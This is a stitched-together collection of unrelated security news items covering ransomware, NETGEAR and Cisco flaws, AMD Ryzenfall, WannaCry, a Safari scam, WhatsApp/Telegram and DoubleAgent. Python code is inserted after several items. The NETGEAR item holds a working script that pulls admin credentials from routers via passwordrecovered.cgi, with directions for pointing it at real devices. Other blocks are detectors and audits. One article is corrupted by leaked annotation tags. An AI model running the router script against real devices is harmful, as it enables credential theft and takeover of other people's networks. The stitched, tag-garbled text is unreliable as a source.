The Managing Director of a company held to ransom by hackers has warned other bosses to protect themselves against cyber crooks, or run the risk of online criminals crippling their businesses. Stuart Kettell, owner of audio-visual specialist Kettell Video Productions, was targeted by scammers who infiltrated his firm’s IT systems with malware that encrypted its network of files. They initially demanded £1,000 in Bitcoin to decrypt the files, and warned that failure to pay would render them permanently inaccessible. Thankfully Stuart routinely backs up all company systems, and even backs up the back-ups, so he survived the attack relatively unscathed. But he has warned that without the archive of replicas his entire business could have collapsed. He said: “I noticed all my photos, videos and pdf files ghosting to white with a new filename… it attacked my desktop first, then it wormed its way into folders one file at a time every few seconds. “I’ve no idea how the malware was introduced as we use software that’s designed to prevent against such attacks. And the demand for payment seemed very professional: I was given links where I could buy Bitcoins and even offered the chance to decrypt one file for free! “I unplugged my computer, isolated it from the internet, and ran some anti-malware software to stop the virus spreading further. “It was scary: I had no idea about cyber-attacks before and really didn’t know what to do. Critical files, including images and videos for clients, were wiped out along with a lifetime of personal memories. “The affected files were lost for good; the only way to recover them was with the key code held by the blackmailer. But luckily I back up everything to an external data cartridge. In the end it was more an inconvenience… but it could have threatened the business.
“I would strongly urge all business owners to back up their essential files.” Sergeant Gary Sirrell from the cybercrime team at West Midlands Regional Organised Crime Unit said commercial web attacks are increasingly being committed against smaller firms and not big multi-nationals. He explained: “Small and medium sized companies are easier targets: they often don’t have the resources or expertise to protect against cyberattacks. And if they are targeted, the impact can be devastating. “But there are steps business owners can take to mitigate the risk. A really effective tactic involves ‘layering’ defences to include a firewall, anti-malware software, staff training (and regular re-training) around phishing email awareness, and finally plugging any holes in your defences by applying software patches and updates in a timely manner. “By exercising good cyber hygiene, and having a strong backup policy, Stuart avoided the dilemma of whether to see his business significantly damaged, or to have to hand over a ransom to organised crime gangs to get his data unlocked. “If more businesses in the West Midlands proactively took such steps there would be significantly fewer crime victims.”
Home routers are the first and sometimes last line of defense for a network. Despite this, many manufacturers of home routers fail to properly audit their devices for security issues before releasing them to the market. As security researchers, we are regularly reminded of this, and sometimes these vulnerabilities simply fall into our hands during our day-to-day lives. Such is the story of the two NETGEAR vulnerabilities I want to share with you today. It was a cold and rainy winter night, almost a year ago, when my lovely NETGEAR VEGN2610 modem/router lost its connection to the Internet. I was tucked in bed, cozy and warm; there was no way I was going downstairs to reset the modem. “I will just reboot it through the web panel,” I thought to myself. Unfortunately I couldn't remember the password and it was too late at night to check whether my roommates had it. I considered my options: Needless to say, I chose the latter. I thought to myself, “Well, it has a web interface and I need to bypass the authentication somehow, so the web server is a good start.” I started manually fuzzing the web server with different parameters. I tried the classic “../..” directory traversal and such, and after about a minute of fuzzing I tried “…” and got this response: (Fig 1: unauth.cgi) “Hmm, what is that unauth.cgi thingy?” Luckily for me the Internet connection had come back on its own, but I was now a man on a mission, so I started to look around to see if there were any known vulnerabilities for my VEGN2610. I started looking up what that “unauth.cgi” page could be, and I found two publicly disclosed exploits from 2014, for different models, that achieve unauthenticated password disclosure.
Those two researchers found that the number returned by unauth.cgi can be used with passwordrecovered.cgi to retrieve the credentials. I tested the method described in both, and voilà: I had my password and could go to sleep happy and satisfied. I woke up the next morning excited by the discovery and thought to myself: “Three routers with the same issue… coincidence?” Luckily, I had another, older NETGEAR router lying around; I tested it and bam! I started asking people I knew whether they had NETGEAR equipment so I could test further and see the scope of the issue. In order to make life easier for non-technical people, I wrote a python script called netgore, similar to wnroast, to test for this issue. I am aware of that, and that is why I don't work as a full-time programmer. As it turned out, I had an error in my code: it didn't correctly take the number from unauth.cgi and passed gibberish to passwordrecovered.cgi instead, but somehow it still managed to get the credentials! After a few trials and errors trying to reproduce the issue, I found that the very first call to passwordrecovered.cgi will give out the credentials no matter what parameter you send. This is a completely new bug that I haven't seen anywhere else. When I tested both bugs on different NETGEAR models, I found that my second bug works on a much wider range of models. A full description of both of these findings, as well as the python script used for testing, can be found here. The vulnerabilities have been assigned CVE-2017-5521 and TWSL2017-003. The responsible disclosure process: this is where the story of discovery ends and the story of disclosure begins. Following our Responsible Disclosure policy, we sent both findings to NETGEAR at the beginning of April 2016.
In our initial contact, the first advisory had 18 models listed as vulnerable, although six of them didn't have the vulnerability in the latest firmware; perhaps it was fixed as part of a different patch cycle. The second advisory included 25 models, all of which were vulnerable in their latest firmware version. In June NETGEAR published a notice that provided a fix for a small subset of vulnerable routers and a workaround for the rest. They also made a commitment to work toward 100% coverage for all affected routers. The notice has been updated several times since then and currently contains 31 vulnerable models, 18 of which are now patched, and 2 models that they previously listed as vulnerable but are now listed as not vulnerable. In fact, our tests show that one of the models listed as not vulnerable (DGN2200v4) is, in fact, vulnerable, and this can easily be reproduced with the PoC provided in our advisory. Over the past nine months we attempted to contact NETGEAR multiple times for clarification and to allow them time to patch more models. Over that time we have found more vulnerable models that were not listed in the initial notice, although they were added later. We also discovered that the Lenovo R3220 router is powered by NETGEAR firmware and was vulnerable as well. Luckily NETGEAR did eventually get back to us, right before we were set to disclose these vulnerabilities publicly.
We were a little skeptical, since our experience to date matched that of other third-party vulnerability researchers who have tried to responsibly disclose to NETGEAR only to be met with frustration. Two things changed that. The first was that NETGEAR committed to pushing out firmware to the currently unpatched models on an aggressive timeline. The second change made us more confident that NETGEAR was not just serious about patching these vulnerabilities, but serious about changing how they handle third-party disclosure in general. We fully expect this move will not only smooth the relationship between third-party researchers and NETGEAR but, in the end, will result in a more secure line of products and services. For starters, the issue affects a large number of models. We have found more than ten thousand vulnerable devices that are remotely accessible. The real number of affected devices is probably in the hundreds of thousands, if not over a million. The vulnerability can be used by a remote attacker if remote administration is set to be Internet-facing; otherwise an attacker needs to be on the local network.
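A checker for the two behaviours described above, written as an added example rather than the author's netgore script: it first makes one passwordrecovered.cgi request with a throwaway id (the second bug answers that very first call regardless of parameter), and only if that fails does it harvest the unauth.cgi number from the 401 page and replay it (the 2014 bug). The HTTP transport is injected so the logic runs offline against a constructed fake; the credential markup, the "id=" link format and the fake router's behaviour are assumptions for this example and vary by model and firmware.

```python
import re
from typing import Callable, Dict, Optional, Tuple

HttpGet = Callable[[str], Tuple[int, str]]  # url -> (status, body)

# Patterns are assumptions for this example; real markup differs by model.
TOKEN_RE = re.compile(r"unauth\.cgi\?id=(\d+)")
USER_RE = re.compile(r"Router Admin Username</td>\s*<td[^>]*>([^<]+)", re.I)
PASS_RE = re.compile(r"Router Admin Password</td>\s*<td[^>]*>([^<]+)", re.I)


def extract_token(body: str) -> Optional[str]:
    m = TOKEN_RE.search(body)
    return m.group(1) if m else None


def extract_credentials(body: str) -> Optional[Tuple[str, str]]:
    u, p = USER_RE.search(body), PASS_RE.search(body)
    return (u.group(1).strip(), p.group(1).strip()) if u and p else None


def check_router(base: str, http_get: HttpGet) -> Dict[str, object]:
    base = base.rstrip("/")
    result: Dict[str, object] = {"bug_any_id": False, "bug_token": False, "credentials": None}

    # Second bug: the very first passwordrecovered.cgi call leaks no matter the id.
    status, body = http_get(f"{base}/passwordrecovered.cgi?id=1")
    creds = extract_credentials(body) if status == 200 else None
    if creds:
        result.update(bug_any_id=True, credentials=creds)
        return result

    # 2014 bug: the unauthenticated 401 page links to unauth.cgi?id=<n>; that
    # n is accepted by passwordrecovered.cgi.
    status, body = http_get(f"{base}/")
    token = extract_token(body) if status == 401 else None
    if token is None:
        return result
    status, body = http_get(f"{base}/passwordrecovered.cgi?id={token}")
    creds = extract_credentials(body) if status == 200 else None
    if creds:
        result.update(bug_token=True, credentials=creds)
    return result


def fake_router(token_required: bool) -> HttpGet:
    """Constructed stand-in for a router, for offline use. With
    token_required=False it models the wider-reaching 'first call' bug."""
    token = "78185530"
    leak = ("<table><tr><td>Router Admin Username</td><td>admin</td></tr>"
            "<tr><td>Router Admin Password</td><td>hunter2</td></tr></table>")
    state = {"first_call": True}

    def http_get(url: str) -> Tuple[int, str]:
        if url.endswith("/"):
            return 401, f'<a href="unauth.cgi?id={token}">Login</a>'
        if "passwordrecovered.cgi" in url:
            first, state["first_call"] = state["first_call"], False
            if url.endswith(f"id={token}") or (first and not token_required):
                return 200, leak
            return 200, "<html>Invalid id</html>"
        return 404, ""

    return http_get


if __name__ == "__main__":
    print(check_router("http://192.168.0.1", fake_router(token_required=False)))
    print(check_router("http://192.168.0.1", fake_router(token_required=True)))
```

Run it only against devices you own or are authorised to test; against a real router, replace `fake_router` with a function that performs the GET (for example with `urllib.request`) and returns the status code and body. Because the second bug is consumed by the first request, the order of the two probes matters: test the any-id variant first.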
Cisco Systems yesterday issued 17 security advisories disclosing vulnerabilities in multiple products, including at least three critical flaws. One of them, a privileged access bug found in seven models of its Small Business Switches, has not yet been patched, but the company has recommended a workaround to limit its potential for damage. Designated CVE-2018-15439 with a CVSS score of 9.8, the unsolved privileged access vulnerability could allow a remote attacker to bypass an affected device’s user authentication mechanism and obtain full admin rights without the legitimate administrators being notified. Although there is currently no software fix, a Cisco advisory says users can implement a workaround by “adding at least one user account with access privilege set to level 15 in the device configuration.” The workaround is effective because the flaw only manifests when the configuration contains no privilege-level-15 account. Affected device models are the Cisco Small Business 200 Series Smart Switches, Small Business 300 Series Managed Switches, Small Business 500 Series Stackable Managed Switches, 250 Series Smart Switches, 350 Series Managed Switches, 350X Series Stackable Managed Switches and 550X Series Stackable Managed Switches. The other critical flaws confirmed in Cisco products were an authentication bypass vulnerability in the Stealthwatch Management Console of Cisco Stealthwatch Enterprise and a remote shell command execution bug in Unity Express. These also carry CVSS scores of 9.8. Cisco published a fourth critical advisory warning of a remote code execution bug in the Apache Struts Commons FileUpload library; however, it is unknown at this time whether any Cisco products and services are affected.
Additional vulnerabilities were found in Cisco’s Meraki networking devices, Video Surveillance Media Server, Content Security Management Appliance, Registered Envelope Service, Price Service Catalog, Prime Collaboration Assurance, Meeting Server, Immunet and AMP for Endpoints, Firepower System Software, Energy Management Suite and Integrated Management Controller Supervisor. And in one final, odd advisory, Cisco acknowledged that a lapse in its QA practices allowed dormant exploit code for the Dirty Cow vulnerability to be included in shipping software images for its Expressway Series and Cisco TelePresence Video Communication Server (VCS) software. “The presence of the sample, dormant exploit code does not represent nor allow an exploitable vulnerability on the product, nor does it present a risk to the product itself as all of the required patches for this vulnerability have been integrated into all shipping software images,” said the advisory. “The affected software images have proactively been removed from the Cisco Software Center and will soon be replaced with fixed software images.”
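Because the workaround for CVE-2018-15439 is a configuration state rather than a patch, it is worth auditing across a fleet of switch backups. The following is an added example, not Cisco tooling: it scans exported running-configs for local `username` lines and reports switches with no privilege-level-15 account. The line shape it parses, and the assumption that an account without an explicit `privilege` clause is level 1, are assumptions for this example; check them against your own switches' output.

```python
import re
from typing import Dict, List

# Assumed line shape for local accounts on these switches; the privilege
# clause may appear before or after the password clause.
USER_RE = re.compile(r"^\s*username\s+(\S+)\b(.*)$", re.I)
PRIV_RE = re.compile(r"\bprivilege\s+(\d+)\b", re.I)
DEFAULT_PRIVILEGE = 1  # assumption: no clause means a level-1 account


def parse_local_users(config: str) -> Dict[str, int]:
    """Map each local username to its privilege level."""
    users: Dict[str, int] = {}
    for line in config.splitlines():
        m = USER_RE.match(line)
        if not m:
            continue
        priv = PRIV_RE.search(m.group(2))
        users[m.group(1)] = int(priv.group(1)) if priv else DEFAULT_PRIVILEGE
    return users


def has_level15_account(config: str) -> bool:
    return any(level == 15 for level in parse_local_users(config).values())


def audit(configs: Dict[str, str]) -> List[str]:
    """Hostnames whose config lacks a level-15 account, i.e. where the
    advisory's workaround has not been applied."""
    return sorted(host for host, cfg in configs.items() if not has_level15_account(cfg))


# Constructed running-config excerpts for two switches (password hashes are dummies).
SWITCH_OK = """
hostname sw-core-1
username admin privilege 15 password encrypted 5f4dcc3b5aa765d61d8327deb882cf99
username readonly privilege 1 password encrypted 5f4dcc3b5aa765d61d8327deb882cf99
"""
SWITCH_BAD = """
hostname sw-edge-3
username netops password encrypted 5f4dcc3b5aa765d61d8327deb882cf99
"""

if __name__ == "__main__":
    print(audit({"sw-core-1": SWITCH_OK, "sw-edge-3": SWITCH_BAD}))
```

Feed it the files your backup job already collects; anything it lists should get a level-15 account added until Cisco ships fixed firmware, and the audit should stay in place afterwards so the account is not removed by a later cleanup.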
AMD has acknowledged the Ryzenfall vulnerabilities discovered by CTS-Labs, though the chip company believes the flaws can be patched via BIOS updates issued over the next few weeks. In a blog post authored by AMD’s chief technical officer, Mark Papermaster, AMD confirmed that the four broad classifications of attacks (Masterkey, Ryzenfall, Fallout, and Chimera) are viable, though they require administrative access to the PC or server in question. Third-party protection, such as Microsoft Windows Credential Guard, also serves to block unauthorized administrative access, Papermaster wrote. In any event, “any attacker gaining unauthorized administrative access would have a wide range of attacks at their disposal well beyond the exploits identified in this research,” AMD’s Papermaster added. But AMD also provided the answer to consumers’ most pressing question: what, if anything, needs to be done? For each of the first three classifications of vulnerabilities, AMD said it is working on firmware updates that the company plans to release during the coming weeks. The fourth category of vulnerability, known as Chimera, affected the Promontory chipset, which CTS-Labs said was designed with logic supplied by ASMedia, a third-party vendor. While AMD said patches for that will also be released via a BIOS update, the company said it is working with the Promontory chipset maker on developing the mitigations, rather than supplying its own. AMD has neither confirmed nor denied whether the attacks can be executed remotely or require local access.
AMD did deny, however, that the attacks have anything to do with Meltdown or Spectre, the two side-channel attacks that rival Intel has worked to patch. About a week ago, CTS-Labs issued a press release as well as a website outlining the vulnerabilities, which the company provided to AMD less than 24 hours before CTS-Labs went public, AMD said. But CTS-Labs also drew fire over boilerplate copy on its website that implied a potential financial interest in the subjects of its reports. PCWorld attempted to interview CTS executives, but later rescinded that request after CTS-Labs representatives demanded a list of questions in advance, and also forbade us from asking about the timing and the company’s financial motivations. In the meantime, however, the vulnerabilities were confirmed by two independent researchers, Trail of Bits and Check Point. Both expressed doubts that attackers would be able to exploit the vulnerabilities that CTS-Labs had originally discovered.
iOS 10.3, released to the public on Monday, patches a bug that allowed bad actors to use a JavaScript pop-up in Safari in an attempt to extort money from iOS users. Security firm Lookout (via Ars Technica) said the scammers targeted Safari users who viewed pornography by placing malicious scripts on various pornographic websites; the scripts created an endless pop-up loop that effectively locked the browser if an uninformed user didn’t know how to get around it. The scammers abused the handling of pop-ups in Mobile Safari in such a way that a person would be “locked” out from using Safari unless they paid a fee, or knew they could simply clear Safari’s cache (see next section). The attack was contained within the app sandbox of the Safari browser; no exploit code was used in this campaign, unlike an advanced attack like Pegasus that breaks out of the app sandbox to install malware on the device. The scammers registered domains and launched the attack from domains they owned, such as police-pay[.]com, which the attackers apparently named with the intent of scaring users looking for certain types of material on the Internet into paying. The pop-ups claimed to be from law-enforcement personnel, and claimed the only way to get control of the browser back was to pay a fine in the form of an iTunes gift card code delivered via text message. Users could actually have escaped the pop-up loop by manually clearing the Safari browser cache; however, a new or otherwise uninformed user might believe they actually needed to pay the ransom before regaining control of their browser. “The attackers effectively used fear as a factor to get what they wanted before the victim realized that there was little actual risk,” Lookout researchers Andrew Blaich and Jeremy Richards said.
iOS 10.3 changes the way pop-up dialogs work in Safari. Previously, a pop-up dialog took over the entire Safari app; now, pop-ups are per tab. iOS users who are hit by the scam before updating to iOS 10.3 can clear their browsing cache by going to “Settings” > “Safari” and tapping “Clear History and Website Data.”
A massive attack is spreading globally by way of a vulnerability in Microsoft's Server Message Block that was patched in March. Ransomware is no longer just a nuisance; now it's quite literally a matter of life and death. A massive ransomware attack being labeled “WannaCry” has been reported around the world and is responsible for shutting down hospitals in the United Kingdom and encrypting files at Spanish telecom firm Telefonica. The WannaCry attack is not a zero-day flaw, but rather is based on an exploit for a flaw that Microsoft patched with its MS17-010 advisory on March 14 in the SMB server. However, Microsoft did not highlight the SMB flaw until April 14, when a hacker group known as the Shadow Brokers released a set of exploits, allegedly stolen from the U.S. National Security Agency. SMB, or Server Message Block, is a critical protocol used by Windows to enable file and folder sharing. It's also the protocol that today's WannaCry attack is exploiting to spread rapidly from one host to the next around the world. The attack is what is known as a worm, “slithering” from one host to the next on connected networks. Among the first large organizations to be impacted by WannaCry was the National Health Service in the UK, which has publicly confirmed that it was attacked by the Wanna Decryptor. “This attack was not specifically targeted at the NHS and is affecting organisations from across a range of sectors,” the NHS stated. “At this stage we do not have any evidence that patient data has been accessed.” Security firm Kaspersky Lab reported that by 2:30 p.m.
ET May 12 it had already seen more than 45,000 WannaCry attacks in 74 countries. While the ransomware is making use of the SMB vulnerability to spread, the encryption of files is done by the Wanna Decryptor component, which seeks out all files on a victim's network. Once the ransomware has completed encrypting files, victims are presented with a screen demanding a ransom. Initially, the ransom requested was reported to be $300 worth of Bitcoin, according to Kaspersky Lab. “Many of your documents, photos, videos, databases and other files are no longer accessible because they have been encrypted,” the ransom note states. “Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service.” It's not clear who the original source of the global WannaCry attacks is at this point, or even whether it's a single threat actor or multiple actors. What is clear is that despite the fact that a software patch has been available since March for the SMB flaws, WannaCry is spreading through tens of thousands of organizations that didn't patch.
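The worm behaviour described above has a simple network signature: one host opening SMB (TCP/445) connections to many distinct hosts in a short time. The following is an added detection example, not part of the original article or of any vendor product: it slides a time window over per-source port-445 flows and alerts when the number of distinct destinations reaches a threshold. The flow records are constructed for the example, and the window, threshold and record format are tuning assumptions; backup servers and vulnerability scanners will also trip it and need an allow-list.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed flow records, "timestamp src dst dport". 10.0.5.17 plays the
# infected host fanning out over TCP/445; 10.0.5.40 is a normal client
# talking to two file servers; one 443 flow shows the port filter working.
SAMPLE_FLOWS = """\
2017-05-12T13:02:00 10.0.5.17 10.0.5.1 445
2017-05-12T13:02:02 10.0.5.17 10.0.5.2 445
2017-05-12T13:02:04 10.0.5.17 10.0.5.3 445
2017-05-12T13:02:05 10.0.5.40 10.0.5.200 445
2017-05-12T13:02:06 10.0.5.17 10.0.5.4 445
2017-05-12T13:02:08 10.0.5.17 10.0.5.5 445
2017-05-12T13:02:09 10.0.5.40 10.0.5.201 445
2017-05-12T13:02:10 10.0.5.17 10.0.5.6 445
2017-05-12T13:02:11 10.0.5.17 10.0.5.250 443
2017-05-12T13:02:12 10.0.5.17 10.0.5.7 445
2017-05-12T13:02:14 10.0.5.17 10.0.5.8 445
2017-05-12T13:02:16 10.0.5.17 10.0.5.9 445
2017-05-12T13:02:18 10.0.5.17 10.0.5.10 445
2017-05-12T13:02:20 10.0.5.17 10.0.5.11 445
2017-05-12T13:02:22 10.0.5.17 10.0.5.12 445
"""

Flow = Tuple[datetime, str, str, int]


def parse_flows(text: str) -> List[Flow]:
    flows: List[Flow] = []
    for line in text.strip().splitlines():
        ts, src, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return flows


def detect_smb_fanout(flows: List[Flow], window: timedelta = timedelta(seconds=60),
                      threshold: int = 10, port: int = 445) -> Dict[str, int]:
    """For each source, slide a window over its port-445 connections in time
    order and record the peak number of distinct destinations seen inside
    any window that reaches the threshold. Returns {source: peak_targets}."""
    by_src: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, src, dst, dport in sorted(flows):
        if dport == port:
            by_src[src].append((ts, dst))
    alerts: Dict[str, int] = {}
    for src, events in by_src.items():
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            targets = {dst for _, dst in events[start:end + 1]}
            if len(targets) >= threshold:
                alerts[src] = max(alerts.get(src, 0), len(targets))
    return alerts


if __name__ == "__main__":
    print(detect_smb_fanout(parse_flows(SAMPLE_FLOWS)))
```

Detection is a backstop, not the fix: the flaw was closed by MS17-010 two months before the outbreak, and blocking TCP/445 at network boundaries plus disabling SMBv1 removes the spreading path for hosts that cannot be patched immediately.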
Back in January 2013, researchers from application security services firm DefenseCode unearthed a remote root access vulnerability in the default installation of some Cisco Linksys (now Belkin) routers. The flaw was actually found in Broadcom’s UPnP implementation used in popular routers, and ultimately the researchers extended the list of vulnerable routers to encompass devices manufactured by the likes of ASUS, D-Link, Zyxel, US Robotics, TP-Link, Netgear, and others. “Back in the day, Cisco fixed the vulnerability, but we are not sure about all other router vendors and models because there are too many of them,” the DefenseCode team noted. When DefenseCode first came out with the vulnerability in 2013, Rapid7 researchers also found a number of flaws in other popular UPnP implementations and, by scanning the Internet, revealed that there were approximately 15 million devices with a vulnerable Broadcom UPnP implementation. It’s difficult to tell how many of these devices are still vulnerable but, as DefenseCode’s Leon Juranic pointed out to me, users rarely (if ever) update their router’s firmware, so there are bound to be many of them still. And given how many people have watched and analyzed their technical video of the exploit in action over the years, obviously many are interested in it. Still, I think we can all agree that four years is more than enough time for patching, and nobody can fault them for publishing the exploit.
Hopefully, if there are manufacturers that still haven’t pushed out a patch, they’ll do it now, but this could also be a welcome impetus for users to update their router’s firmware, especially those that haven’t done it for years. Where no firmware update is available, disabling UPnP, or at least making sure it is not reachable from the WAN side, removes the remote exposure regardless of the firmware version.
A flaw in popular messenger apps WhatsApp and Telegram , which could allow hackers to gain access to hundreds of millions of accounts using the very encryption software designed to keep them out , has been discoveredVulnerability-related.DiscoverVulnerabilityby cyber security firm Check Point . The Israeli multinational said it was concerned about vulnerabilities in the messaging apps , following WikiLeaks ’ ‘ Vault 7 ’ release of more than 8,500 CIA documents . “ One of the most concerning revelations arising from the recent WikiLeaks publication is the possibility that government organizations can compromise WhatsApp , Telegram and other end-to-end encrypted chat applications , ” the company said in a blog post . These online versions mirror all messages sent and received by a user ’ s mobile device , which deploys end-to-end encryption so that only those sending and receiving messages can view the content . Hackers could gain access to a user ’ s account , however , by booby-trapping a digital image with malicious code which would be activated once the image is viewed . The code could then spread like a virus by sending infected messages to a user 's contacts . “ This means that attackers could potentially download your photos and or post them online , send messages on your behalf , demand ransomAttack.Ransom, and even take over your friends ’ accounts , ” they added . Check Point saidVulnerability-related.DiscoverVulnerabilityit alertedVulnerability-related.DiscoverVulnerabilityboth companies to the problem last week and waited for the issues to be resolvedVulnerability-related.PatchVulnerabilitybefore making it public . Both companies have said they ’ ve since patched the problem . “ Thankfully , WhatsApp and Telegram responded quicklyVulnerability-related.DiscoverVulnerabilityand responsibly to deploy the mitigation against exploitation of this issue in all web clients , ” Check Point Head of Product Vulnerability Oded Vanunu said . 
The company has advised, however, that WhatsApp and Telegram web users should restart their browser to ensure they’re using the latest versions of the service.
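The article does not spell out how the booby-trapped "image" is built, and the check below is not Check Point's research or the fix WhatsApp and Telegram deployed. It is an added example of the generic control that stops this class of attack in a web client or upload service: never trust the declared MIME type or file extension of an attachment, sniff the magic bytes, and refuse to render inline anything that is not really an image or that carries HTML or script alongside an image header. The sample attachments, the marker list and the function names are constructed for the example.

```python
# Added example (not Check Point's research and not WhatsApp's or Telegram's
# fix): a server- or client-side check for attachments that are declared as
# images but do not actually contain image data, e.g. an HTML/script payload
# sent with an image MIME type. All sample inputs below are constructed.

IMAGE_MAGIC = {
    "png":  b"\x89PNG\r\n\x1a\n",
    "jpeg": b"\xff\xd8\xff",
    "gif":  b"GIF8",          # GIF87a / GIF89a
}

# Markers of active web content; checked case-insensitively in the first 4 KiB.
ACTIVE_CONTENT_MARKERS = (b"<script", b"<html", b"<!doctype html",
                          b"javascript:", b"onerror=", b"onload=")


def sniff_image_type(data: bytes):
    """Return the image type implied by the file's magic bytes, or None."""
    for kind, magic in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    if data[:4] == b"RIFF" and data[8:12] == b"WEBP":
        return "webp"
    return None


def contains_active_content(data: bytes) -> bool:
    head = data[:4096].lower()
    return any(marker in head for marker in ACTIVE_CONTENT_MARKERS)


def normalise_declared_type(mime: str) -> str:
    """'image/jpg' and 'image/jpeg' both mean jpeg; anything else is kept as-is."""
    sub = mime.lower().split("/", 1)[-1].strip()
    return "jpeg" if sub == "jpg" else sub


def classify_attachment(declared_mime: str, data: bytes):
    """Decide whether an attachment may be rendered inline as an image.

    Returns (verdict, detail): verdict is 'allow' or 'reject'.
    """
    sniffed = sniff_image_type(data)
    declared = normalise_declared_type(declared_mime)
    if sniffed is None:
        if contains_active_content(data):
            return "reject", "declared as image but contains HTML/script"
        return "reject", "no recognised image signature"
    if declared != sniffed:
        return "reject", f"declared {declared} but signature says {sniffed}"
    if contains_active_content(data):
        # Valid image header followed by markup: treat as a polyglot, not an image.
        return "reject", f"{sniffed} header but active content embedded"
    return "allow", sniffed


# Constructed samples: a clean PNG header, an HTML page sent as a JPEG,
# a GIF/HTML polyglot, and a JPEG mislabelled as PNG.
SAMPLES = {
    "clean_png":    ("image/png",  IMAGE_MAGIC["png"] + b"\x00" * 16),
    "html_as_jpeg": ("image/jpeg", b"<!DOCTYPE html><html><script>fetch('/steal')</script></html>"),
    "gif_polyglot": ("image/gif",  b"GIF89a" + b"\x01\x00\x01\x00" + b"<script>x()</script>"),
    "jpeg_as_png":  ("image/png",  IMAGE_MAGIC["jpeg"] + b"\xe0\x00\x10JFIF"),
}


def run_samples():
    """Classify every constructed sample; returns {name: (verdict, detail)}."""
    return {name: classify_attachment(mime, data) for name, (mime, data) in SAMPLES.items()}


if __name__ == "__main__":
    for name, (verdict, detail) in run_samples().items():
        print(f"{name:14} {verdict:6} {detail}")
```

Whatever passes this check should still be served with the sniffed Content-Type, `X-Content-Type-Options: nosniff`, and, for anything unrecognised, `Content-Disposition: attachment`, so the browser never gets a chance to interpret attacker-supplied bytes as a page running in the messaging app's origin.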
Security researchers from computer and network security outfit Cybellum have revealed a new zero-day code injection and persistence technique that can be used by attackers to take over applications and entire Windows machines. They demonstrated the attack on antivirus solutions, and ultimately dubbed it DoubleAgent, as it turns the antivirus security agent into a malicious agent. “DoubleAgent exploits a legitimate tool of Windows called ‘Microsoft Application Verifier’ which is a tool included in all versions of Microsoft Windows and is used as a runtime verification tool in order to discover and fix bugs in applications,” the company explained. “Our researchers discovered an undocumented ability of Application Verifier that gives an attacker the ability to replace the standard verifier with his own custom verifier. An attacker can use this ability in order to inject a custom verifier into any application. Once the custom verifier has been injected, the attacker now has full control over the application”. In fact, the attack can be used to compromise all kinds of applications, but the researchers chose to focus on antivirus solutions since this type of software is generally considered to be trusted. “By using DoubleAgent, the attacker can take full control over the antivirus and do as he wishes without the fear of being caught or blocked,” they noted. This includes: Cybellum researchers demonstrated a DoubleAgent code injection against Symantec Norton antivirus, and offered PoC exploit code on GitHub. More technical details about the DoubleAgent technique can be found here. The researchers have notified major antivirus vendors of their findings, and some of them (Malwarebytes, AVG) have already issued a patch for the vulnerability.
Among the still vulnerable antivirus apps are those by Avast, BitDefender, ESET, Kaspersky, and F-Secure. “Microsoft has provided a new design concept for antivirus vendors called Protected Processes. The new concept is specially designed for antivirus services. Antivirus processes can be created as ‘Protected Processes’ and the protected process infrastructure only allows trusted, signed code to load and has built-in defense against code injection attacks,” the researchers explained. “This means that even if an attacker found a new zero-day technique for injecting code, it could not be used against the antivirus as its code is not signed. Currently no antivirus (except Windows Defender) has implemented this design, even though Microsoft made this design available more than 3 years ago”. The vulnerability that allows the DoubleAgent attack works on all Microsoft Windows versions and architectures. The attack technique can be used to take over any application, and even the OS. “We need to make more efforts to detect and prevent these attacks, and stop blindly trusting traditional security solutions,” the researchers noted. We implemented the fix at the time of reporting and therefore can confirm that both the Avast and AVG 2017 products, launched earlier this year, are not vulnerable. It is important to note that the exploit requires administrator privileges to conduct the attack, which is difficult for hackers to achieve.
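The "custom verifier" the researchers describe is registered through the registry: an Image File Execution Options (IFEO) key for the target executable with the application-verifier bit (0x100) set in GlobalFlag and the provider DLL names in VerifierDlls. That detail is general Windows knowledge about how Application Verifier is configured, not something the article states. Because the technique is a persistence mechanism that survives reboots, a defender's first question is whether any program on a host has such an entry, and in particular whether a security product's process does. The following is an added example, not Cybellum's code or any vendor's patch: it scans an exported registry (.reg) text for IFEO entries that turn on Application Verifier and name a provider DLL, and flags DLLs that are not on an assumed allowlist of Microsoft's own providers. The export, the `secagent.exe` and `updater.dll` names in it, and the allowlist are constructed for the example.

```python
# Added example, not from Cybellum or any antivirus vendor: scan an exported
# Image File Execution Options (IFEO) registry tree for entries that turn on
# Application Verifier for a program and name a verifier provider DLL, which
# is the configuration an Application Verifier-based injection relies on.
import re

IFEO_MARKER = "\\image file execution options\\"
FLG_APPLICATION_VERIFIER = 0x100   # bit in GlobalFlag that enables the verifier

# Assumed allowlist of Microsoft's own verifier provider DLLs. Treat it as a
# starting point for your own environment, not as an authoritative list.
KNOWN_VERIFIER_PROVIDERS = {"vrfcore.dll", "vfbasics.dll"}

_VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg_export(text: str) -> dict:
    """Parse the subset of .reg syntax written by 'reg export': [key] headers
    and "name"=value lines. Returns {key: {name_lowercase: value}} with dword
    values as int and quoted strings unescaped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m is None or current is None:
            continue
        name, value = m.group(1).lower(), m.group(2)
        if value.startswith("dword:"):
            sections[current][name] = int(value[len("dword:"):], 16)
        elif len(value) >= 2 and value[0] == '"' and value[-1] == '"':
            sections[current][name] = value[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        else:
            sections[current][name] = value   # hex(...) and other types kept raw
    return sections


def find_verifier_providers(reg_text: str) -> list:
    """Return one finding per IFEO entry with the verifier bit set and a
    non-empty VerifierDlls value, in the order they appear in the export."""
    findings = []
    for key, values in parse_reg_export(reg_text).items():
        if IFEO_MARKER not in key.lower():
            continue
        flags = values.get("globalflag", 0)
        dlls = values.get("verifierdlls", "")
        if not isinstance(flags, int) or not (flags & FLG_APPLICATION_VERIFIER) or not dlls:
            continue
        dll_list = dlls.split()
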